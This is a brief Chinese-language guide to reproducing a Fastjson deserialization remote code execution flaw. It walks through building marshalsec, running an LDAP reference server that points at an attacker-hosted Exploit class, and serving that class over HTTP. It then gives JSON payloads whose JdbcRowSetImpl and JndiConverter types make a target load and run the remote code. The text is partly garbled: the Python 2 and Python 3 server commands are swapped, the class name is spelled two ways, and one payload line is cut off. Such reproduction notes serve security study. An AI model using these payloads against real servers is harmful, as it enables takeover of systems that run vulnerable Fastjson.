Fastjson 遠程代碼掃描漏洞復現
- 環境搭建
1)反序列化攻擊工具源碼下載:https://github.com/mbechler/marshalsec
使用maven命令:mvn clean package -DskipTests 編譯成.jar文件
啟動(默認端口1389):java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip/#Expolit
- 編寫Expolit.java文件
使用javac Expolit.java,編譯成為class文件
python2: python -m http.server 80
python3: python -m SimpleHTTPServer 80 - payload:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:1389/Exploit", "autoCommit":true}
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","dataSourceName":"ldap://ip:1389/Exploit", "autoCommit":true}【ip也可直接在http://dnslog.cn/中獲取】
{"a":"a\x
參考:
https://www.cnblogs.com/Akkuman/p/11190475.html
https://github.com/RealBearcat/Fastjson-Payload